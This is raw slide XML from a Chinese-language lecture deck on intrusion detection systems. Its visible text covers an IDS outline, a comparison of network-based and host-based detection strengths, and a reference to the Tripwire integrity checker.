            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6152" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 2"/>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遵循通用公共许可证GPL</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="组合 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750695" y="5473700"/>
            <a:ext cx="6710680" cy="39560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en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://www.qast.com/tripwire/index.htm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8531225" y="4819015"/>
            <a:ext cx="2718435" cy="1460500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9743F54D-546D-4AFA-904A-71D273ABEB22}"/>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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2168525" y="1906905"/>
            <a:ext cx="2273300" cy="3856355"/>
            <a:chOff x="2256" y="2928"/>
            <a:chExt cx="3580" cy="6073"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="52" name="组合 51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2266" y="4393"/>
              <a:ext cx="3193" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="3193" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="2248"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侦测速度快</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="55" name="组合 54"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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14" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2256" y="5276"/>
              <a:ext cx="2760" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="2760" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="181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隐蔽性好</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="21" name="组合 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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2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25" name="组合 24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2262" y="6088"/>
              <a:ext cx="2756" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="2756" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="181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视野更宽</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="27" name="组合 26"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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3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32" name="组合 31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2258" y="6917"/>
              <a:ext cx="3577" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="3577" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="263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较少的检测器</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="34" name="组合 33"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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51"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nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2748" y="2928"/>
              <a:ext cx="2269" cy="1155"/>
              <a:chOff x="3792538" y="3138472"/>
              <a:chExt cx="1239837" cy="734063"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22"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28"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29"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NIDS</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="组合 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2260" y="7693"/>
              <a:ext cx="3577" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="3577" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="2632"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占用资源少</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="40" name="组合 39"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="81" name="组合 80"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7496548" y="1906905"/>
            <a:ext cx="3271520" cy="3565325"/>
            <a:chOff x="10342" y="2928"/>
            <a:chExt cx="5152" cy="5615"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="AutoShape 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10798" y="6752"/>
              <a:ext cx="997" cy="837"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 100000"/>
                <a:gd name="adj2" fmla="val 57269"/>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panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="组合 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10714" y="2928"/>
              <a:ext cx="2269" cy="1155"/>
              <a:chOff x="3792538" y="3138472"/>
              <a:chExt cx="1239837" cy="734063"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="AutoShape 15"/>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41" name="Freeform 16"/>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42" name="Text Box 24"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3860800" y="3293024"/>
                <a:ext cx="1109663" cy="4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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>HIDS</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="45" name="组合 44"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10342" y="4512"/>
              <a:ext cx="3193" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="3193" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="2248"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rPr>
                  <a:t>视野更集中</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="47" name="组合 46"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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4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54" name="组合 53"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10343" y="5386"/>
              <a:ext cx="5151" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="5151" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="57" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="4206"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易于用户自定义</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="60" name="组合 59"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>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64" name="组合 63"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10347" y="6290"/>
              <a:ext cx="4320" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="4320" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="65" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="3375"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保护更加周密</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="66" name="组合 65"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>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70" name="组合 69"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10347" y="7235"/>
              <a:ext cx="4442" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="4442" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="71" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="349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noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                    <a:sym typeface="+mn-ea"/>
                  </a:rPr>
                  <a:t>对网络流量不敏感</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="72" name="组合 71"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="73" name="图片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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82" name="图片 81"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="3467735"/>
            <a:ext cx="1921510" cy="1318260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="127000"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC3867B-3E2B-44F7-9248-466B1B69A20E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.2 HIDS</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7FE56C7-A938-4AC0-8C8B-98AE9D55AB45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="1620000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DE48FB-93CB-4A83-80C4-819A2E19507D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="矩形: 圆角 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075E11FA-47AF-410A-B62E-11BF604B473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7C1ACD8E-1DB0-407F-8ED0-530CC024A020}"/>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01</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0245B580-05B9-4A4A-A880-F45BF4A3B95D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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accent4"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 入侵检测系统概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F393E855-347F-47DC-BF7C-D072346A7DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="2520000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FBE5B2F-A33E-455C-94DC-0DD74C8598CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="矩形: 圆角 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2BBEC0-744D-4D63-A1D7-D3EF3C0B5C6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0AFCDB31-7A42-4D30-973E-C7696D19502E}"/>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02</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FFEE7EAF-90BC-43F6-B7C2-088D4C3BCA4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原理和主要方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EFCCFF-6C07-4C65-8ED3-5FFF91FBAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="3420000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="组合 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6066EB41-F32C-45C4-99C1-0918D8C5174D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="矩形: 圆角 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14524E7A-B812-4FB1-9D63-990CF664AB3A}"/>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86134F92-3E5A-4DE8-A8AE-9BB2DCB1B79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03</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DE2AA675-157B-45F1-8702-9486056053C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NIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>HIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>DIDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
